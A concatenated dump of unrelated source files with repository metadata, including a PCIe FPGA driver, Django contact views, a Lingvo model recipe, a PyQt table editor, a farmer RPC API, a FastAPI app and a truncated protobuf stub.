        # Send the request header, then read back the response, which
        # echoes the header in front of the payload (stripped below).
        self.write_pcie_command(CMD_PERIPHERAL_WRITE, hdr_dword_len, 0x00)
        os.write(self.dev, d)
        self.write_pcie_command(CMD_PERIPHERAL_READ,
                                length + hdr_dword_len, 0x00)
        data = Array('B', os.read(self.dev, (length * 4) + hdr_byte_len))
        return data[hdr_byte_len:]

    def write(self, address, data, disable_auto_inc=False):
        """write

        Generic write command used to write data to a Nysa image

        Args:
            address (int): Address of the register/memory to write to
            data (array of unsigned bytes): raw bytes to send to the device
            disable_auto_inc (bool): if true, auto increment feature will
                be disabled

        Returns:
            Nothing

        Raises:
            NysaCommError: When a failure of communication is detected
        """
        # Pad a *copy* up to a dword boundary; the original padded the
        # caller's buffer in place, mutating the argument.
        payload = Array('B', data)
        while len(payload) % 4 != 0:
            payload.append(0x00)
        length = len(payload) // 4
        d = self._build_bus_packet(0x00000001, length, address,
                                   disable_auto_inc)
        d.extend(payload)
        self.write_pcie_command(CMD_PERIPHERAL_WRITE, len(d) // 4, 0x00)
        os.write(self.dev, d)

    def ping(self):
        """Ping the Nysa image (currently a no-op on this platform)."""
        return

    def reset(self):
        """Software-reset the Nysa FPGA master via the reset command.

        This may not reset the entire FPGA image.
        """
        self.write_pcie_command(CMD_COMMAND_RESET, 0, 0)

    def is_programmed(self):
        """Return True -- on this platform the FPGA is assumed programmed."""
        return True

    def get_sdb_base_address(self):
        """Return the address where the SDB can be read (always 0 here)."""
        return 0x00000000

    def wait_for_interrupts(self, wait_time=1):
        """Listen for interrupts for ``wait_time`` seconds.

        Raises:
            AssertionError: not implemented on this platform.
        """
        raise AssertionError("%s not implemented" % sys._getframe().f_code.co_name)

    def register_interrupt_callback(self, index, callback):
        """Register ``callback`` for interrupts on bit ``index`` (no-op)."""
        return

    def unregister_interrupt_callback(self, index, callback=None):
        """Remove ``callback`` for bit ``index`` (no-op, fails quietly)."""
        return

    def get_board_name(self):
        """Return the platform name string."""
        return "artemis_pcie"

    def upload(self, filepath):
        """Upload an FPGA image to the board.

        Raises:
            AssertionError: not implemented on this platform.
        """
        raise AssertionError("%s not implemented" % sys._getframe().f_code.co_name)

    def program(self):
        """Initiate an FPGA program sequence (image must be uploaded first).

        Raises:
            AssertionError: not implemented on this platform.
        """
        raise AssertionError("%s not implemented" % sys._getframe().f_code.co_name)

    def ioctl(self, name, arg=None):
        """Execute a platform-specific function ``name`` with ``arg``.

        Raises:
            AssertionError: not implemented on this platform.
        """
        raise AssertionError("%s not implemented" % sys._getframe().f_code.co_name)

    def list_ioctl(self):
        """Return the available ioctl functions and their descriptions.

        Raises:
            AssertionError: not implemented on this platform.
        """
        raise AssertionError("%s not implemented" % sys._getframe().f_code.co_name)
"[email protected]"
] | |
e72fb5148e9d6560555da3cb66069e5cb311d78e | 147519505f3c47e5f10d9679e07d3719931b9fd0 | /my_contacts/contacts/views.py | 177a81dfd5a303c238013aa4c1cbcc9b156afbe2 | [] | no_license | grbalmeida/hello-django | 85ed28d8d47a9a2e072f3eecd13d22fb2e977a31 | 9ef261ba5faeac3de8d36eeb7efa8974e5d1e661 | refs/heads/master | 2020-08-12T10:10:48.554349 | 2019-12-20T01:18:33 | 2019-12-20T01:18:33 | 214,748,310 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,670 | py | from django.shortcuts import render, get_object_or_404, Http404, redirect
from django.core.paginator import Paginator
from django.db.models import Q, Value
from django.db.models.functions import Concat
from django.contrib import messages
from django.contrib.auth.decorators import login_required
from .models import Contact
@login_required(redirect_field_name='login')
def index(request):
    """List visible contacts, newest first, two per page."""
    visible_contacts = Contact.objects.order_by('-id').filter(show=True)

    paginator = Paginator(visible_contacts, 2)
    contacts = paginator.get_page(request.GET.get('p'))

    return render(request, 'contacts/index.html', {'contacts': contacts})
@login_required(redirect_field_name='login')
def see_contact(request, contact_id):
    """Show a single contact; contacts flagged as hidden return 404."""
    contact = get_object_or_404(Contact, id=contact_id)

    if not contact.show:
        raise Http404()

    context = {'contact': contact}
    return render(request, 'contacts/see_contact.html', context)
@login_required(redirect_field_name='login')
def search(request):
    """Search visible contacts by full name or phone.

    Redirects back to the index with a warning when the ``term`` query
    parameter is missing or empty.
    """
    term = request.GET.get('term')

    # ``not term`` already covers both None and the empty string; the
    # original ``term is None or not term`` was redundant.
    if not term:
        messages.add_message(
            request,
            messages.WARNING,
            'Term field cannot be empty'
        )
        return redirect('index')

    full_name = Concat('name', Value(' '), 'last_name')
    # Consistency fix: index() and see_contact() hide contacts with
    # show=False, but search previously leaked them into results.
    contacts = Contact.objects.annotate(
        full_name=full_name
    ).filter(
        Q(full_name__icontains=term) |
        Q(phone__icontains=term)
    ).filter(show=True)

    paginator = Paginator(contacts, 2)
    contacts = paginator.get_page(request.GET.get('p'))

    return render(request, 'contacts/search.html', {'contacts': contacts})
| [
"[email protected]"
] | |
8dc96ae6d44f834bc6be387acb6a7d8ae7d3e972 | a9eed4d7b8d5256af9f33363761683bba32f106f | /apps/organization/migrations/0006_auto_20180620_2140.py | 98e71397529b5d6e0e4d6500af697f01abd731dc | [] | no_license | cannon-liu/mkonline | 12735d4761663ba42fdd6fe781a2658a5db1b383 | 2a1c64c10ae67abe58c1bfcd77c564fd53957067 | refs/heads/master | 2020-03-28T22:19:08.747770 | 2018-09-18T06:17:50 | 2018-09-18T06:17:50 | 149,223,626 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 433 | py | # Generated by Django 2.0.6 on 2018-06-20 21:40
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('organization', '0005_auto_20180620_1655'),
]
operations = [
migrations.AlterField(
model_name='teacher',
name='image',
field=models.ImageField(upload_to='teacher/%Y/%m', verbose_name='教师图片'),
),
]
| [
"[email protected]"
] | |
50d3fa769119f65fde8c60106790dd20765218bf | effce116340b7d937bd285e43b49e1ef83d56156 | /data_files/profiler.py | 721d79980232dad6801fb4dd8236482b83610596 | [] | no_license | DL2021Spring/CourseProject | a7c7ef57d69bc1b21e3303e737abb27bee3bd585 | 108cdd906e705e9d4d05640af32d34bfc8b124da | refs/heads/master | 2023-04-11T18:52:30.562103 | 2021-05-18T09:59:59 | 2021-05-18T09:59:59 | 365,733,976 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 353 | py | from cProfile import Profile
from pstats import Stats
__author__ = 'Daniel'
def demo():
f = lambda x: x
profiler = Profile()
profiler.runcall(f)
stats = Stats(profiler)
stats.strip_dirs()
stats.sort_stats('cumulative')
stats.print_stats()
stats.print_callers()
stats.print_callees()
| [
"[email protected]"
] | |
045e91eefbb6784e11a0d581027f7438c82d7ee4 | 211874c8c72ad0ff1e4d30b29f2e179161a36195 | /lingvo/tasks/milan/params/dual_encoder_recipe.py | 34d43f560fae603a1f930703f68e0a0e586a149f | [
"Apache-2.0"
] | permissive | sailfish009/lingvo | d3308260d2365477e38c4b1b61bdaa4405172b1e | 432e1b0918459c28fcfbed0e6d1a2f48a962a80f | refs/heads/master | 2023-04-19T03:15:51.420821 | 2021-04-27T22:52:45 | 2021-04-27T22:53:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,743 | py | # Lint as: python3
# Copyright 2021 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Helpers for defining Milan dual-encoder models."""
import functools
from lingvo.core import base_model_params
from lingvo.core import layers as lingvo_layers
from lingvo.core import optimizer
from lingvo.core import schedule
from lingvo.tasks.milan import constants
from lingvo.tasks.milan import dataset_spec
from lingvo.tasks.milan import dual_encoder
from lingvo.tasks.milan import input_generator
class RecipeError(Exception):
pass
class DualEncoderRecipe(base_model_params.SingleTaskModelParams):
"""Base class that simplifies configuration of Milan dual encoder models.
`DualEncoderRecipe` is a `SingleTaskModelParams` with extra builder-like
methods for configuring the dual encoder (the `Task()` params) and input
generators (`Train()`, `Dev()`, `Test()`).
In typical usage, model definitions subclass `DualEncoderRecipe`, call helper
methods in the constructor to configure the dual encoder, and specify a
`default_dataset` for the model to run on. For example::
@model_registry.RegisterSingleTaskModel
class MyExperiment(DualEncoderRecipe):
def __init__(self):
super().__init__()
self.AddModality(
'TEXT',
input_feature='text_feature',
id_feature='text_id',
encoder=MyTextEncoder.Params(),
encoder_output_dim=42)
# Preprocess the raw 'image_feature' input prior to encoding.
self.AddPreprocessor('image_feature', ImagePreprocessor.Params())
self.AddModality(
'IMAGE',
input_feature='image_feature',
id_feature='image_id',
encoder=MyImageEncoder.Params(),
encoder_output_dim=67)
@property
def default_dataset(self) -> DatasetSpec:
# Point to your dataset of choice
...
"""
def __init__(self):
# Define these members here to make pytype happy.
self.dataset = None
self.input_params = None
self.task_params = None
self.dataset = self._ChooseDatasetSpec()
# Base input params, be shared by both train and eval sets.
self.input_params = input_generator.MilanInputGenerator.Params().Set(
batch_size=64,
# Run input pipeline on each TPU host (vs. one for all hosts) to
# avoid input-boundedness.
use_per_host_infeed=True)
# Default optimization and checkpointer settings.
self.task_params = dual_encoder.MilanTask.Params()
self.task_params.train.Set(
clip_gradient_norm_to_value=1.0,
grad_norm_tracker=lingvo_layers.GradNormTracker.Params().Set(
name='grad_norm_tracker',
# Don't clip if the grad norm is already smaller than this.
grad_norm_clip_cap_min=0.1),
save_max_to_keep=2000,
save_keep_checkpoint_every_n_hours=0.1667, # At most every 10 min.
optimizer=optimizer.Adam.Params().Set(
beta1=0.9, beta2=0.999, epsilon=1e-8),
learning_rate=0.0001,
lr_schedule=schedule.StepwiseExponentialSchedule.Params().Set(
decay=0.999, num_steps_per_decay=1000),
tpu_steps_per_loop=100,
max_steps=40000)
def _ChooseDatasetSpec(self):
"""Returns the `DatasetSpec` to be used by the recipe."""
return self.default_dataset
@property
def default_dataset(self) -> dataset_spec.DatasetSpec:
"""Returns a default dataset for the recipe to use.
Subclasses should override this method to specify a dataset, or add logic
(elsewhere) to choose the dataset at runtime, falling back to this one
as the default.
"""
raise NotImplementedError()
@property
def encoder_configs(self):
return self.task_params.dual_encoder.encoder_configs
def AddModality(self, name: str, **kwargs):
config = dual_encoder.EncoderConfig().Set(**kwargs)
self.encoder_configs[name] = config
return config
def AddPreprocessor(self, input_feature, preprocessor):
self.input_params.preprocessors[input_feature] = preprocessor.Copy()
def StartFromCheckpoint(self, checkpoint_path: str):
"""Configures the recipe to start training from the given model checkpoint.
This is intended to be used in fine-tuning recipes. All variables, including
Adam accumulators, are loaded from the checkpoint except for global step
(so that it resets to 0 in new experiment) and grad norm tracker stats
(since gradients are likely to have different moments in the new
experiment).
Args:
checkpoint_path: Path of the checkpoint to start training from.
"""
self.task_params.train.init_from_checkpoint_rules = {
checkpoint_path: (
[('(.*)', '%s')],
# Don't load vars matching these regexes.
['.*grad_norm_tracker/.*', 'global_step'])
}
# Methods below implement the lingvo SingleTaskModelParams interface, allowing
# the recipe to be registered with `RegisterSingleTaskModel()`.
def Train(self):
"""Returns Params for the training dataset."""
dataset_fn = functools.partial(
self.dataset.Read,
split=constants.Split.TRAIN,
shuffle_buffer_size=1024)
return self.input_params.Copy().Set(name='Train', dataset_fn=dataset_fn)
def Dev(self):
"""Returns Params for the development dataset."""
dataset_fn = functools.partial(
self.dataset.Read, split=constants.Split.DEV, shuffle_buffer_size=0)
return self.input_params.Copy().Set(name='Dev', dataset_fn=dataset_fn)
def Test(self):
"""Returns Params for the test dataset."""
dataset_fn = functools.partial(
self.dataset.Read, split=constants.Split.TEST, shuffle_buffer_size=0)
return self.input_params.Copy().Set(name='Test', dataset_fn=dataset_fn)
def Task(self):
task_params = self.task_params.Copy()
if not task_params.dual_encoder.encoder_configs:
raise RecipeError('Must configure at least one encoder.')
assert task_params.dual_encoder.label_fn is None
task_params.dual_encoder.label_fn = self.dataset.Label
return task_params
| [
"[email protected]"
] | |
ca570fc3f6bac84c77a2c7ed692f80fdf74003e1 | d737fa49e2a7af29bdbe5a892bce2bc7807a567c | /software/qt_examples/src/pyqt-official/sql/cachedtable.py | fc5e0ccdcaaacec4422fb011786cc34c79471638 | [
"MIT",
"CC-BY-NC-SA-4.0",
"GPL-1.0-or-later",
"GPL-3.0-only"
] | permissive | TG-Techie/CASPER | ec47dfbfd6c3a668739ff4d707572e0b853518b4 | 2575d3d35e7dbbd7f78110864e659e582c6f3c2e | refs/heads/master | 2020-12-19T12:43:53.825964 | 2020-01-23T17:24:04 | 2020-01-23T17:24:04 | 235,736,872 | 0 | 1 | MIT | 2020-01-23T17:09:19 | 2020-01-23T06:29:10 | Python | UTF-8 | Python | false | false | 4,184 | py | #!/usr/bin/env python
#############################################################################
##
## Copyright (C) 2013 Riverbank Computing Limited.
## Copyright (C) 2010 Nokia Corporation and/or its subsidiary(-ies).
## All rights reserved.
##
## This file is part of the examples of PyQt.
##
## $QT_BEGIN_LICENSE:BSD$
## You may use this file under the terms of the BSD license as follows:
##
## "Redistribution and use in source and binary forms, with or without
## modification, are permitted provided that the following conditions are
## met:
## * Redistributions of source code must retain the above copyright
## notice, this list of conditions and the following disclaimer.
## * Redistributions in binary form must reproduce the above copyright
## notice, this list of conditions and the following disclaimer in
## the documentation and/or other materials provided with the
## distribution.
## * Neither the name of Nokia Corporation and its Subsidiary(-ies) nor
## the names of its contributors may be used to endorse or promote
## products derived from this software without specific prior written
## permission.
##
## THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
## "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
## LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
## A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
## OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
## SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
## LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
## DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
## THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
## (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
## OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE."
## $QT_END_LICENSE$
##
#############################################################################
from PyQt5.QtCore import Qt
from PyQt5.QtWidgets import (QApplication, QDialog, QDialogButtonBox,
QHBoxLayout, QMessageBox, QPushButton, QTableView)
from PyQt5.QtSql import QSqlTableModel
import connection
class TableEditor(QDialog):
def __init__(self, tableName, parent=None):
super(TableEditor, self).__init__(parent)
self.model = QSqlTableModel(self)
self.model.setTable(tableName)
self.model.setEditStrategy(QSqlTableModel.OnManualSubmit)
self.model.select()
self.model.setHeaderData(0, Qt.Horizontal, "ID")
self.model.setHeaderData(1, Qt.Horizontal, "First name")
self.model.setHeaderData(2, Qt.Horizontal, "Last name")
view = QTableView()
view.setModel(self.model)
submitButton = QPushButton("Submit")
submitButton.setDefault(True)
revertButton = QPushButton("&Revert")
quitButton = QPushButton("Quit")
buttonBox = QDialogButtonBox(Qt.Vertical)
buttonBox.addButton(submitButton, QDialogButtonBox.ActionRole)
buttonBox.addButton(revertButton, QDialogButtonBox.ActionRole)
buttonBox.addButton(quitButton, QDialogButtonBox.RejectRole)
submitButton.clicked.connect(self.submit)
revertButton.clicked.connect(self.model.revertAll)
quitButton.clicked.connect(self.close)
mainLayout = QHBoxLayout()
mainLayout.addWidget(view)
mainLayout.addWidget(buttonBox)
self.setLayout(mainLayout)
self.setWindowTitle("Cached Table")
def submit(self):
self.model.database().transaction()
if self.model.submitAll():
self.model.database().commit()
else:
self.model.database().rollback()
QMessageBox.warning(self, "Cached Table",
"The database reported an error: %s" % self.model.lastError().text())
if __name__ == '__main__':
import sys
app = QApplication(sys.argv)
if not connection.createConnection():
sys.exit(1)
editor = TableEditor('person')
editor.show()
sys.exit(editor.exec_())
| [
"[email protected]"
] | |
9fc60961ec8cdf589ac40c7a9a1ed86cf073e0f3 | 2c95e0f7bb3f977306f479d5c99601ab1d5c61f2 | /olive/rpc/farmer_rpc_api.py | 2544c04855463194e9428596f772ea7d75e8b7b9 | [
"Apache-2.0"
] | permissive | Olive-blockchain/Olive-blockchain-CLI | d62444f8456467f8105531178d2ae53d6e92087d | 8c4a9a382d68fc1d71c5b6c1da858922a8bb8808 | refs/heads/main | 2023-07-19T03:51:08.700834 | 2021-09-19T16:05:10 | 2021-09-19T16:05:10 | 406,045,499 | 0 | 0 | Apache-2.0 | 2021-09-19T16:05:10 | 2021-09-13T16:20:38 | Python | UTF-8 | Python | false | false | 5,569 | py | from typing import Callable, Dict, List, Optional
from olive.farmer.farmer import Farmer
from olive.types.blockchain_format.sized_bytes import bytes32
from olive.util.byte_types import hexstr_to_bytes
from olive.util.ws_message import WsRpcMessage, create_payload_dict
class FarmerRpcApi:
def __init__(self, farmer: Farmer):
self.service = farmer
self.service_name = "olive_farmer"
def get_routes(self) -> Dict[str, Callable]:
return {
"/get_signage_point": self.get_signage_point,
"/get_signage_points": self.get_signage_points,
"/get_reward_targets": self.get_reward_targets,
"/set_reward_targets": self.set_reward_targets,
"/get_pool_state": self.get_pool_state,
"/set_payout_instructions": self.set_payout_instructions,
"/get_harvesters": self.get_harvesters,
"/get_pool_login_link": self.get_pool_login_link,
}
async def _state_changed(self, change: str, change_data: Dict) -> List[WsRpcMessage]:
if change == "new_signage_point":
sp_hash = change_data["sp_hash"]
data = await self.get_signage_point({"sp_hash": sp_hash.hex()})
return [
create_payload_dict(
"new_signage_point",
data,
self.service_name,
"wallet_ui",
)
]
elif change == "new_farming_info":
return [
create_payload_dict(
"new_farming_info",
change_data,
self.service_name,
"wallet_ui",
)
]
elif change == "new_plots":
return [
create_payload_dict(
"get_harvesters",
change_data,
self.service_name,
"wallet_ui",
)
]
return []
async def get_signage_point(self, request: Dict) -> Dict:
sp_hash = hexstr_to_bytes(request["sp_hash"])
for _, sps in self.service.sps.items():
for sp in sps:
if sp.challenge_chain_sp == sp_hash:
pospaces = self.service.proofs_of_space.get(sp.challenge_chain_sp, [])
return {
"signage_point": {
"challenge_hash": sp.challenge_hash,
"challenge_chain_sp": sp.challenge_chain_sp,
"reward_chain_sp": sp.reward_chain_sp,
"difficulty": sp.difficulty,
"sub_slot_iters": sp.sub_slot_iters,
"signage_point_index": sp.signage_point_index,
},
"proofs": pospaces,
}
raise ValueError(f"Signage point {sp_hash.hex()} not found")
async def get_signage_points(self, _: Dict) -> Dict:
result: List = []
for _, sps in self.service.sps.items():
for sp in sps:
pospaces = self.service.proofs_of_space.get(sp.challenge_chain_sp, [])
result.append(
{
"signage_point": {
"challenge_hash": sp.challenge_hash,
"challenge_chain_sp": sp.challenge_chain_sp,
"reward_chain_sp": sp.reward_chain_sp,
"difficulty": sp.difficulty,
"sub_slot_iters": sp.sub_slot_iters,
"signage_point_index": sp.signage_point_index,
},
"proofs": pospaces,
}
)
return {"signage_points": result}
async def get_reward_targets(self, request: Dict) -> Dict:
search_for_private_key = request["search_for_private_key"]
return self.service.get_reward_targets(search_for_private_key)
async def set_reward_targets(self, request: Dict) -> Dict:
farmer_target, pool_target = None, None
if "farmer_target" in request:
farmer_target = request["farmer_target"]
if "pool_target" in request:
pool_target = request["pool_target"]
self.service.set_reward_targets(farmer_target, pool_target)
return {}
async def get_pool_state(self, _: Dict) -> Dict:
pools_list = []
for p2_singleton_puzzle_hash, pool_dict in self.service.pool_state.items():
pool_state = pool_dict.copy()
pool_state["p2_singleton_puzzle_hash"] = p2_singleton_puzzle_hash.hex()
pools_list.append(pool_state)
return {"pool_state": pools_list}
async def set_payout_instructions(self, request: Dict) -> Dict:
launcher_id: bytes32 = hexstr_to_bytes(request["launcher_id"])
await self.service.set_payout_instructions(launcher_id, request["payout_instructions"])
return {}
async def get_harvesters(self, _: Dict):
return await self.service.get_harvesters()
async def get_pool_login_link(self, request: Dict) -> Dict:
launcher_id: bytes32 = bytes32(hexstr_to_bytes(request["launcher_id"]))
login_link: Optional[str] = await self.service.generate_login_link(launcher_id)
if login_link is None:
raise ValueError(f"Failed to generate login link for {launcher_id.hex()}")
return {"login_link": login_link}
| [
"[email protected]"
] | |
aaa6aa548821da963e638937b213dc378966b3c7 | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/55/usersdata/88/23890/submittedfiles/av2_p3_civil.py | ed8eac935d52a83bb78809e7cbded4971043205d | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 708 | py | # -*- coding: utf-8 -*-
from __future__ import division
import numpy as np
def slinha(a,x):
soma=0
for j in range(0,a.shape[1],1):
soma=soma+a[x,j]
return soma
def scoluna(a,y):
soma=0
for i in range(0,a.shape[0],1):
soma=soma+a[i,y]
return soma
def somatorio(a,x,y):
soma=(slinha(a,x)+scoluna(a,y))-(2*a[x,y])
return soma
n=input('Dê a dimensão da matriz: ')
x=input('Digite a coordenada da linha: ')
y=input('Digite a coordenada da coluna: ')
a=np.zeros((n,n))
for i in range(0,a.shape[0],1):
for j in range(0,a.shape[1],1):
a[i,j]=input('Digite um elemento da matriz: ')
somatotal=somatorio(a,x,y)
print ('%d' %somatotal)
| [
"[email protected]"
] | |
3951a840c8f398942a0c28d4e5f40a8e9f9f69a1 | 33836016ea99776d31f7ad8f2140c39f7b43b5fe | /fip_collab/2015_03_17_plastic_polycrystal/calibration.py | f385c0c6a6ac236b52df962dea3b4c3b32f84600 | [] | no_license | earthexploration/MKS-Experimentation | 92a2aea83e041bfe741048d662d28ff593077551 | 9b9ff3b468767b235e7c4884b0ed56c127328a5f | refs/heads/master | 2023-03-17T23:11:11.313693 | 2017-04-24T19:24:35 | 2017-04-24T19:24:35 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,830 | py | # -*- coding: utf-8 -*-
"""
Created on Fri May 23 14:25:50 2014
This script performs the MKS calibration given the microstructure function
and the FIP response, both in frequency space.
@author: nhpnp3
"""
import time
import numpy as np
import functions as rr
from functools import partial
import tables as tb
def calibration_procedure(el, H, ns, set_id, step, comp, wrt_file):
# open HDF5 file
base = tb.open_file("D_%s%s_s%s.h5" % (ns, set_id, step), mode="r")
# retrieve data from HDF5 file
resp = base.get_node('/', 'r%s' % comp)
r_fft = resp.r_fft[...]
M = base.root.msf.M[...]
# close the HDF5 file
base.close()
start = time.time()
specinfc = np.zeros((H, el**3), dtype='complex64')
# here we perform the calibration for the scalar FIP
specinfc[:, 0] = rr.calib(0, M, r_fft, 0, H, el, ns)
[specinfc[:, 1], p] = rr.calib(1, M, r_fft, 0, H, el, ns)
# calib_red is simply calib with some default arguments
calib_red = partial(rr.calib, M=M, r_fft=r_fft,
p=p, H=H, el=el, ns=ns)
specinfc[:, 2:(el**3)] = np.asarray(map(calib_red, range(2, el**3))).swapaxes(0, 1)
# open HDF5 file
base = tb.open_file("infl_%s%s_s%s.h5" % (ns, set_id, step), mode="a")
# create a group one level below root called infl[comp]
group = base.create_group('/',
'infl%s' % comp,
'influence function for component %s' % comp)
base.create_array(group,
'infl_coef',
specinfc,
'array of influence coefficients')
# close the HDF5 file
base.close()
end = time.time()
timeE = np.round((end - start), 3)
msg = 'Calibration, component %s: %s seconds' % (comp, timeE)
rr.WP(msg, wrt_file)
| [
"[email protected]"
] | |
a01a5b1f58abd518d11593d8bf433d842f768037 | 8f6aa9ac9c8c2e409875bbf36fbc49b3eb37d88b | /enthought/pyface/i_image_cache.py | 4a5bd9b1c0f48877eacba33f5ee9f7ac19573d67 | [
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | enthought/etsproxy | 5660cf562c810db2ceb6b592b6c12274bce96d73 | 4aafd628611ebf7fe8311c9d1a0abcf7f7bb5347 | refs/heads/master | 2023-03-27T04:51:29.297305 | 2020-12-02T09:05:18 | 2020-12-02T09:05:18 | 1,632,969 | 3 | 1 | NOASSERTION | 2020-12-02T09:05:20 | 2011-04-18T22:29:56 | Python | UTF-8 | Python | false | false | 50 | py | # proxy module
from pyface.i_image_cache import *
| [
"[email protected]"
] | |
c3844394a1d734f67a9d8879ca813c80bfbe37eb | 80f56878dbceb714266abca85519ebbfa131404e | /app/main.py | 9266f39af6e62cd635ea47fef07f21720c4cb42c | [] | no_license | z-sector/async-fastapi-sqlalchemy | 1b944173972bc8487a2f9c638810ba0ffffbbbf5 | 9d622677c56d6d8495f3c87522216f289d52e2f7 | refs/heads/main | 2023-08-15T03:05:10.260060 | 2021-09-12T00:55:02 | 2021-09-12T00:55:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 496 | py | from fastapi import FastAPI
from fastapi.responses import JSONResponse
from app.api.main import router as api_router
from app.settings import Settings
settings = Settings()
app = FastAPI(title="async-fastapi-sqlalchemy")
app.include_router(api_router, prefix="/api")
@app.get("/", include_in_schema=False)
async def health() -> JSONResponse:
return JSONResponse({"message": "It worked!!"})
if __name__ == "__main__":
import uvicorn
uvicorn.run(app, host="0.0.0.0", port=8000)
| [
"[email protected]"
] | |
cf297f53e6ac80a9e6f143b01404bb8118b28817 | 8c5e45061286c10cba373c1576432cc43bc387fc | /venv/bin/easy_install | aeb63742c78362328a12c31888d6cfb3f0b23c7b | [] | no_license | Ruldane/Mapping-using-Pandas-Folium | 13828b18ad0c7eeb45afad46d50f94f22ef9c908 | c0f8d6cda2898f8075d52e31ba9712f47e54b145 | refs/heads/master | 2020-06-10T17:07:05.522872 | 2019-06-25T10:22:13 | 2019-06-25T10:22:13 | 193,685,125 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 441 | #!/home/ruldane/PycharmProjects/Mapping/venv/bin/python
# EASY-INSTALL-ENTRY-SCRIPT: 'setuptools==40.8.0','console_scripts','easy_install'
__requires__ = 'setuptools==40.8.0'
import re
import sys
from pkg_resources import load_entry_point
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(
load_entry_point('setuptools==40.8.0', 'console_scripts', 'easy_install')()
)
| [
"[email protected]"
] | ||
3b14bebd791e49b44c807127e1d8c83ab8667dd2 | bc441bb06b8948288f110af63feda4e798f30225 | /resource_package_tools_sdk/model/easy_flow/deploy_strategy_pb2.pyi | 96c1f94d9b9d719ffac232700204d7507eacb6ca | [
"Apache-2.0"
] | permissive | easyopsapis/easyops-api-python | 23204f8846a332c30f5f3ff627bf220940137b6b | adf6e3bad33fa6266b5fa0a449dd4ac42f8447d0 | refs/heads/master | 2020-06-26T23:38:27.308803 | 2020-06-16T07:25:41 | 2020-06-16T07:25:41 | 199,773,131 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | false | 15,205 | pyi | # @generated by generate_proto_mypy_stubs.py. Do not edit!
import sys
from google.protobuf.descriptor import (
Descriptor as google___protobuf___descriptor___Descriptor,
)
from google.protobuf.internal.containers import (
RepeatedCompositeFieldContainer as google___protobuf___internal___containers___RepeatedCompositeFieldContainer,
)
from google.protobuf.message import (
Message as google___protobuf___message___Message,
)
from resource_package_tools_sdk.model.cmdb.cluster_info_pb2 import (
ClusterInfo as resource_package_tools_sdk___model___cmdb___cluster_info_pb2___ClusterInfo,
)
from resource_package_tools_sdk.model.easy_flow.deploy_target_pb2 import (
DeployTarget as resource_package_tools_sdk___model___easy_flow___deploy_target_pb2___DeployTarget,
)
from resource_package_tools_sdk.model.easy_flow.target_info_pb2 import (
TargetInfo as resource_package_tools_sdk___model___easy_flow___target_info_pb2___TargetInfo,
)
from typing import (
Iterable as typing___Iterable,
Optional as typing___Optional,
Text as typing___Text,
Union as typing___Union,
)
from typing_extensions import (
Literal as typing_extensions___Literal,
)
builtin___bool = bool
builtin___bytes = bytes
builtin___float = float
builtin___int = int
if sys.version_info < (3,):
builtin___buffer = buffer
builtin___unicode = unicode
class DeployStrategy(google___protobuf___message___Message):
DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...
class App(google___protobuf___message___Message):
DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...
name = ... # type: typing___Text
appId = ... # type: typing___Text
def __init__(self,
*,
name : typing___Optional[typing___Text] = None,
appId : typing___Optional[typing___Text] = None,
) -> None: ...
if sys.version_info >= (3,):
@classmethod
def FromString(cls, s: builtin___bytes) -> DeployStrategy.App: ...
else:
@classmethod
def FromString(cls, s: typing___Union[builtin___bytes, builtin___buffer, builtin___unicode]) -> DeployStrategy.App: ...
def MergeFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def CopyFrom(self, other_msg: google___protobuf___message___Message) -> None: ...
def ClearField(self, field_name: typing_extensions___Literal[u"appId",b"appId",u"name",b"name"]) -> None: ...
class BatchStrategy(google___protobuf___message___Message):
DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...
class AutoBatch(google___protobuf___message___Message):
DESCRIPTOR: google___protobuf___descriptor___Descriptor = ...
batchNum = ... # type: builtin___int
batchInterval = ... # type: builtin___int
failedStop = ... # type: builtin___bool
def __init__(self,
*,
